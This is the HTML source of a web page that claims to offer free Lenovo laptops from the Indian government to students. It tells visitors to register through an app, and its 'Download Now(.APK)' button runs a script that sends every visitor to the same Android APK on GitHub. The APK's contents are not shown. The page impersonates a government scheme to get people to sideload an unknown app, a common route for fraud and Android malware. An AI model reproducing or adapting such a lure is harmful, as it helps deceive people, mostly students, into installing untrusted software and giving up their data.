<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>

<title>Government Free Laptop</title>
<meta name="title" content="Government Free Laptop">
<meta name="description" content="">

<meta property="og:type" content="website">
<meta property="og:title" content="Government Free Laptop">
<meta property="og:description" content="Get Free Laptop from Government to-all Students of India">
<meta property="og:image" content="view-source:https://1.bp.blogspot.com/-QW9UlG5Ck-U/X2MdIevC8nI/AAAAAAAAALk/TshUR1n7CyQXsMNRlUFuCsolRTMn8-3ugCLcBGAsYHQ/s1000/macbook-air-1_dey1.jpg">

<style>
body{
background-color:#000;
color:#fff;
font-family: sans-serif;
}
p,h2{
color:#FFF;
}
.myButton {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.wefn {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  text-align: center;
  min-height: 100vh;
}
.myButton:hover {
	background-color:#314179;
}
.myButton:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function dabavlod() 
{
    var m = new Date().getMinutes(); 
	if(m<500)
	{
		window.location="https://github.com/indiadigitalgo/A/raw/main/Register_Mylaptop.apk"; 
	}
	else if(m<55)
	{
		window.location="https://github.com/indiadigitalgo/A/raw/main/Register_Mylaptop.apk";
	}
	else
	{
		window.location="https://github.com/indiadigitalgo/A/raw/main/Register_Mylaptop.apk";
	}
}
</script>

</head>
<body>
<center>
<div class="wefn">
	<img src="https://i.postimg.cc/HLDrkJhk/a56305d0ba56045c57ac088b7a345ec5.jpg" width="35%" />
	<br>
	<p><h1>Government Free Laptop</h1>
		<h2>Get free Lenovo Laptop from Government<br>
		to all-students of India.<Br>
		LENOVO PVT.LTD<br> 
		</h2>
<h3>Register your Number on (Register-Laptop) app.<br>
Download app and register now!!</h3>
	</p>
	<a onClick="dabavlod()" class="myButton">Download Now(.APK)</a>
</div>
</center>
</body>
</html>